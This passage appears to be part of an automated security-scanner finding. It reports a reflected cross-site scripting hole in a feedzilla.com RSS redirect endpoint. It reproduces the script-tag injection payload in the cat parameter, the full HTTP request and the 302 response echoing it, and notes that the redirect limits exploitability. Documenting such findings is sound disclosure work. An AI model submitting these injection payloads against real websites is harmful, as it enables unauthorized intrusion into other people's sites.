<html><head><title>Object Moved</title></head><body><h1>Object moved</h1><br>The object can be found <a href="http://api.feedzilla.com/v1/articles.rss?category_name=business&subcategory_name=mortgage2c5e4"><script>alert(1)</script>e49c418b94f&title_only=1&embed_source_in_title=0&embed_sharing_links=0&client_source=FLASH_WIDGET"> ...[SNIP]...
The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b4df"><script>alert(1)</script>de2ee12f61a was submitted in the cat parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /rss/flash_feed.asp?cat=business3b4df"><script>alert(1)</script>de2ee12f61a&Cat2=mortgage HTTP/1.1 Host: www.feedzilla.com Proxy-Connection: keep-alive Referer: http://urlwww--feedzilla--com.rtrk.com/tools/news-widget.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASPSESSIONIDQCDCDQCR=EBONDDMACNKMJCOEBLEAOEIL
Response
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 16:02:41 GMT Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (l 0 s 0 v 0 o 0)) X-Powered-By: ASP.NET Location: http://api.feedzilla.com/v1/articles.rss?category_name=business3b4df"><script>alert(1)</script>de2ee12f61a&subcategory_name=mortgage&title_only=1&embed_source_in_title=0&embed_sharing_links=0&client_source=FLASH_WIDGET Content-Type: text/html; charset=iso-8859-1 Content-Length: 352
<html><head><title>Object Moved</title></head><body><h1>Object moved</h1><br>The object can be found <a href="http://api.feedzilla.com/v1/articles.rss?category_name=business3b4df"><script>alert(1)</script>de2ee12f61a&subcategory_name=mortgage&title_only=1&embed_source_in_title=0&embed_sharing_links=0&client_source=FLASH_WIDGET"> ...[SNIP]...